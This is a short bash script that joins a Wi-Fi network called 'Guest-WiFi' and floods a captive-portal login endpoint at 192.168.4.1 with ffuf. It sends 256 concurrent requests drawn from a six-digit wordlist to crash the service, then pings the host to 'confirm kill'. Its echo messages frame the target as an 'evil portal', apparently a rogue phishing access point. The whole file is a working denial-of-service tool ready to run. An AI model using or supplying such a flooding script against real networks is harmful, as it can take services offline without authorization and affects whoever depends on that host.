#!/bin/bash
wifi_device=wlan1
ssid=Guest-WiFi
host="192.168.4.1"

wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt

sudo nmcli d disconnect $wifi_device > /dev/null

sudo nmcli dev wifi rescan > /dev/null

echo -e "\nCashing This Evil Portal With No Survivors\n"

sudo nmcli device wifi connect $ssid ifname $wifi_device

echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n"

ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3

echo -e "\n\nPinging To Confirm Kill...\n"
ping -c 4 $host

echo -e "\nThat Was Big Payload (4U)\nRIP"
